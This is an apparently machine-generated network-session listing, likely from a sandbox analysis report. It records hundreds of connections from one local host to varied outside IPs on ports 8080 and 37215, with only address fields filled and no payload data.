                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23498192.168.2.2343070181.126.188.1728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23499192.168.2.233543063.221.149.188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23500192.168.2.2349512132.174.144.1818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23501192.168.2.2340010180.165.77.2428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23502192.168.2.2355368154.31.179.1638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23503192.168.2.2337768176.52.222.698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23504192.168.2.2348212178.179.211.1338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23505192.168.2.233823094.129.201.2448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23506192.168.2.234771247.174.79.1108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23507192.168.2.2341590107.76.19.2188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23508192.168.2.2358076185.119.247.1948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23509192.168.2.235782048.22.197.2008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23510192.168.2.2355188152.65.180.2558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23511192.168.2.2340564130.59.189.448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23512192.168.2.2352430202.13.188.2548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23513192.168.2.2348252193.58.179.118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23514192.168.2.234079083.57.47.1898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23515192.168.2.2346886172.134.154.2538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23516192.168.2.235497281.96.143.148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23517192.168.2.2342188129.115.117.1568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23518192.168.2.235649014.176.232.648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23519192.168.2.233594890.232.83.1518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23520192.168.2.235092491.187.144.2018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23521192.168.2.2354432126.224.35.1148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23522192.168.2.23414861.126.140.778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23523192.168.2.235407691.9.32.428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23524192.168.2.2355622160.205.202.1488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23525192.168.2.2333218171.122.147.358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23526192.168.2.2336956184.26.106.1438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23527192.168.2.2344434195.206.19.2418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23528192.168.2.2344812179.23.111.348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23529192.168.2.234201054.69.91.2338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23530192.168.2.234934668.85.9.1398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23531192.168.2.2349294206.195.49.1958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23532192.168.2.2353324206.26.88.188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23533192.168.2.2353678197.16.77.11637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23534192.168.2.235591441.85.224.19137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23535192.168.2.235372241.149.29.17437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23536192.168.2.2337920197.151.181.9637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23537192.168.2.2358922197.98.90.11037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23538192.168.2.2353160197.131.167.17137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23539192.168.2.235706641.59.60.17737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23540192.168.2.234723041.167.62.18637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23541192.168.2.235131041.7.243.13237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23542192.168.2.2344612157.196.12.22537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23543192.168.2.2345732157.195.44.8937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23544192.168.2.235376241.23.134.2137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23545192.168.2.2346014197.182.141.7537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23546192.168.2.2357416197.45.231.12937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23547192.168.2.233803893.158.226.2237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23548192.168.2.234692041.38.81.11537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23549192.168.2.2338608157.219.229.19637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23550192.168.2.2346842168.230.105.3837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23551192.168.2.234630441.195.53.2237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23552192.168.2.2356264157.29.146.2837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23553192.168.2.2337226197.53.181.9737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23554192.168.2.234572441.139.75.12437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23555192.168.2.2348482197.66.158.19237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23556192.168.2.234559054.211.41.6137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23557192.168.2.2356752118.146.218.25137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23558192.168.2.2340856157.163.113.25237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23559192.168.2.2345454197.192.160.23437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23560192.168.2.2334692197.229.103.20337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23561192.168.2.235588641.57.173.20037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23562192.168.2.233473442.145.40.5437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23563192.168.2.2358414157.229.150.037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23564192.168.2.2360882157.117.178.11837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23565192.168.2.2350632124.213.209.23937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23566192.168.2.2351720197.2.119.8337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23567192.168.2.2337232219.136.235.24137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23568192.168.2.2340240157.195.163.2337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23569192.168.2.2351360197.75.51.16437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23570192.168.2.2344982180.47.64.23037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23571192.168.2.2354790157.136.148.437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23572192.168.2.235629841.196.157.6137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23573192.168.2.236040241.176.175.16537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23574192.168.2.233919614.152.209.16137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23575192.168.2.2346780197.168.113.18937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23576192.168.2.2348496170.7.212.24837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23577192.168.2.2353610168.62.17.19837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23578192.168.2.235435618.111.36.12837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23579192.168.2.233891841.125.72.3837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23580192.168.2.234028641.168.110.3437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23581192.168.2.2349370157.217.40.737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23582192.168.2.233595441.106.164.10037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23583192.168.2.2336158206.55.47.15937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23584192.168.2.2333288197.203.249.7137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23585192.168.2.234289644.58.153.12037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23586192.168.2.2335894197.141.121.13637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23587192.168.2.233516041.20.109.16237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23588192.168.2.235618641.142.133.8637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23589192.168.2.235630641.151.202.18137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23590192.168.2.2360484197.41.36.23337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23591192.168.2.2355462197.243.48.6937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23592192.168.2.2343880197.55.42.9537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23593192.168.2.2348042197.215.156.3737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23594192.168.2.2352260157.66.131.7437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23595192.168.2.2358722157.101.156.4237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23596192.168.2.2343230114.217.15.20037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23597192.168.2.2344570157.63.171.22137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23598192.168.2.235793641.8.77.19837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23599192.168.2.2353334197.23.18.7337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23600192.168.2.235476241.224.171.24537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23601192.168.2.2355552157.158.53.15937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23602192.168.2.234834472.49.31.19637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23603192.168.2.235312441.70.146.3537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23604192.168.2.2358254161.46.147.16737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23605192.168.2.236061241.45.183.13737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23606192.168.2.234676441.9.212.23637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23607192.168.2.2342332157.184.154.23637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23608192.168.2.2341248157.76.69.22337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23609192.168.2.2355984197.124.255.4137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23610192.168.2.2347594197.222.151.12837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23611192.168.2.2338522197.56.251.18937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23612192.168.2.233556241.253.22.7637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23613192.168.2.2346468116.14.31.5337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23614192.168.2.2338016197.14.127.22937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23615192.168.2.233844441.85.228.7437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23616192.168.2.2347790122.72.103.12637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23617192.168.2.235814041.142.43.7237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23618192.168.2.235505841.88.145.21837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23619192.168.2.2337014157.194.191.23037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23620192.168.2.235124641.78.67.24837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23621192.168.2.2347784197.93.59.1037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23622192.168.2.2333308197.80.13.4337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23623192.168.2.233522441.20.205.11637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23624192.168.2.2345564130.139.21.1137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23625192.168.2.2357332197.88.246.14137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23626192.168.2.2358468103.59.50.21837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23627192.168.2.2357650199.80.125.8637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23628192.168.2.2335440157.226.89.12237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23629192.168.2.2333160197.241.68.25137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23630192.168.2.2357216157.37.136.11437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23631192.168.2.2351358197.30.71.15737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23632192.168.2.2346424197.53.40.19937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23633192.168.2.2340200197.20.113.17837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23634192.168.2.2349462197.66.100.25437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23635192.168.2.233691070.185.165.4437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23636192.168.2.2336980197.186.95.3437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23637192.168.2.235900672.70.120.18037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23638192.168.2.2335466157.209.51.1237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23639192.168.2.2355408157.23.212.10637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23640192.168.2.235236841.54.182.16237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23641192.168.2.233364041.177.166.7737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23642192.168.2.2359664197.193.23.23037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23643192.168.2.2356878157.25.121.13037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23644192.168.2.2356338197.238.150.23537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23645192.168.2.2360886197.142.203.4037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23646192.168.2.2359930197.125.158.1937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23647192.168.2.2359104184.145.170.1237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23648192.168.2.2351954197.90.8.18837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23649192.168.2.23542005.238.161.14937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23650192.168.2.2338308157.232.243.3537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23651192.168.2.2357070197.217.8.11937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23652192.168.2.2332886157.207.45.25037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23653192.168.2.233630636.8.238.12237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23654192.168.2.2352918197.130.222.7737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23655192.168.2.2357502157.244.104.14037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23656192.168.2.236087241.56.135.23037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23657192.168.2.2344384197.222.70.12837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23658192.168.2.2357462197.85.206.4937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23659192.168.2.2358616197.63.60.19637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23660192.168.2.236072041.6.80.20237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23661192.168.2.2346160161.156.100.20437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23662192.168.2.2342760197.177.203.19437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23663192.168.2.2351732167.74.28.14637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23664192.168.2.235007241.31.101.23037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23665192.168.2.2357324157.135.97.25337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23666192.168.2.233872041.214.203.637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23667192.168.2.2356406197.247.16.21537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23668192.168.2.2341310197.163.224.21037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23669192.168.2.2342144118.40.39.20637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23670192.168.2.2338192148.175.134.3137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23671192.168.2.2357806197.67.220.24537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23672192.168.2.2335234147.55.242.15137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23673192.168.2.2342080197.155.198.237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23674192.168.2.234865241.129.80.4437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23675192.168.2.2350386157.182.139.21637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23676192.168.2.2335624157.249.156.5837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23677192.168.2.2347512197.234.220.037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23678192.168.2.234797266.199.104.11237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23679192.168.2.234624041.179.153.16637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23680192.168.2.235040283.137.39.10437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23681192.168.2.2341938157.30.27.14737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23682192.168.2.235370832.223.87.23737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23683192.168.2.234487241.193.72.3537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23684192.168.2.2336784148.170.48.818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23685192.168.2.2357018120.226.239.1238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23686192.168.2.2345024130.45.49.288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23687192.168.2.233967635.105.179.1478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23688192.168.2.234404077.27.127.2258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23689192.168.2.2338926135.15.210.208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23690192.168.2.2340848135.206.114.2368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23691192.168.2.235314440.34.176.828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23692192.168.2.2358436142.179.252.1298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23693192.168.2.2352538155.184.9.848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23694192.168.2.234371284.165.119.1138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23695192.168.2.234297052.183.159.1338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23696192.168.2.2357450195.106.95.1588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23697192.168.2.2359648169.115.103.2058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23698192.168.2.23444205.119.234.1978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23699192.168.2.2334834138.115.234.1268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23700192.168.2.2353450207.136.164.1068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23701192.168.2.2358386156.113.214.1118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23702192.168.2.2359844134.241.31.2408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23703192.168.2.233326872.141.200.1818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23704192.168.2.234692895.174.205.2278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23705192.168.2.235077459.159.118.1018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23706192.168.2.2356184141.187.186.338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
